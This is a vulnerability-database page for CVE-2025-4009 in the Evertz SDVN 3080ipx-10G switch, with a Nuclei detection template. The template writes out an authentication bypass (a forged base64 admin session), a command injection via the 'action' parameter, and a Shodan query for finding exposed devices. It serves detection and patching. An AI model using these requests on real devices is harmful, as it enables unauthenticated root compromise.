Lucene search
K

Evertz SDVN 3080ipx-10G - Unauthenticated Arbitrary Command Injection

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

Evertz SDVN 3080ipx-10G has unauthenticated command injection allowing remote access and control.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-4009
28 May 202507:45
circl
CNNVD
Evertz SDVN 3080ipx-10G 安全漏洞
28 May 202500:00
cnnvd
CNNVD
Evertz SDVN 3080ipx-10G 安全漏洞
12 Sep 202500:00
cnnvd
CNNVD
Evertz SDVN 3080ipx-10G 安全漏洞
12 Sep 202500:00
cnnvd
CVE
CVE-2025-10364
12 Sep 202513:48
cve
CVE
CVE-2025-10365
12 Sep 202513:46
cve
CVE
CVE-2025-4009
28 May 202507:00
cve
Cvelist
CVE-2025-4009 Unauthenticated Arbitrary Command Injection in Evertz SDVN
28 May 202507:00
cvelist
EUVD
EUVD-2025-16284
3 Oct 202520:07
euvd
EUVD
EUVD-2025-29046
3 Oct 202520:07
euvd
Rows per page
id: CVE-2025-4009

info:
  name: Evertz SDVN 3080ipx-10G - Unauthenticated Arbitrary Command Injection
  author: ONEKEY,iamnoooob,pdresearch
  severity: critical
  description: |
    The Evertz SDVN 3080ipx-10G is a High Bandwidth Ethernet Switching Fabric for Video Application. This device exposes a web management interface on port 80. This web management interface can be used by administrators to control product features, setup network switching, and register license among other features. The application has been developed in PHP with the webEASY SDK, also named ‘ewb’ by Evertz.This web interface has two endpoints that are vulnerable to arbitrary command injection and the authentication mechanism has a flaw leading to authentication bypass.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.This level of access could lead to serious business impact such as the interruption of media streaming, modification of media being streamed, alteration of closed captions being generated, among others.
  impact: |
    Unauthenticated attackers can bypass authentication and execute arbitrary commands with root privileges, potentially disrupting media streaming or manipulating content.
  remediation: |
    Apply the security patch from Evertz or restrict network access to the web management interface to trusted administrators only.
  reference:
    - https://www.onekey.com/resource/security-advisory-remote-code-execution-on-evertz-svdn-cve-2025-4009
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/V:C
    cvss-score: 9.3
    epss-score: 0.74535
    epss-percentile: 0.99437
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"evertz.min.css"
  tags: cve,cve2025,evertz,rce,unauth,vkev,vuln

variables:
  payload: '{"user": {"name": "admin", "login": "admin"},"role":{"name":"administrator", "restrictions": [],"deleteable": false}}'

http:
  - raw:
      - |
        GET /login.php?authorized={{base64(payload)}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "PHPSESSID","webeasy-loggedin","index.php")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /v.1.5/php/features/feature-transfer-export.php?action=id;&filename=&varid=&slot= HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202c9f7e19b5b1860a6019c37136408b3bdadbbdfdd5dbd3f71fed65609bfbe67d0221009af63232f035f40c2da53315dbf4129ca1c27af3422d097d62c77ff0c25babd8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 49.3
EPSS0.74535
SSVC
24